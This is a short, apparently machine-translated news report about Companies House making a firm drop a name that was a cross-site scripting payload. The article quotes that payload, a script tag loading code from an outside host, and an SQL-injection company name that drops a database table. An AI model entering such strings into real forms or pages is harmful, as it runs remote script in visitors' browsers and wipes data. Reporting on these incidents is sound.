Great Britain: Company name prohibited due to security vulnerability

The British authority Companies House, which is responsible for the local commercial register, has forced a company to change its name, as it may pose a security risk. The company name consisted of HTML code, which was structured like a classic cross-site scripting attack (XSS) and could allow the execution of Javascript code in the context of a website – including the website of the British authority.

he did not choose the company name to attack the Companies House website, but rather thought it was “a funny, playful name” for his consulting firm, the company founder the British newspaper Guardian explained. However, one can hardly imagine that with the original company name:

<

“><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD

If the HTML code, nothing else is the company name, is not properly validated and output in an HTML element in a web page, a script from the URL in the company name is executed in the context of the web page. The Guardian writes that the stored script has only issued a harmless warning. However, it could have been used for attacks at a later time.

Now the company has been renamed to “That Company whose Name used to contain HTML Script Tags LTD”. It is not the first time that a company name contains code, so the company name “; DROP TABLE “COMPANIES”;– LTD” should delete contents of the database using an SQL command. However, according to the Guardian, the companies were not forced to change their names. On the website of the authority, Companies House, instead of the name, the Guardian simply displays “Name of company available on request”.

<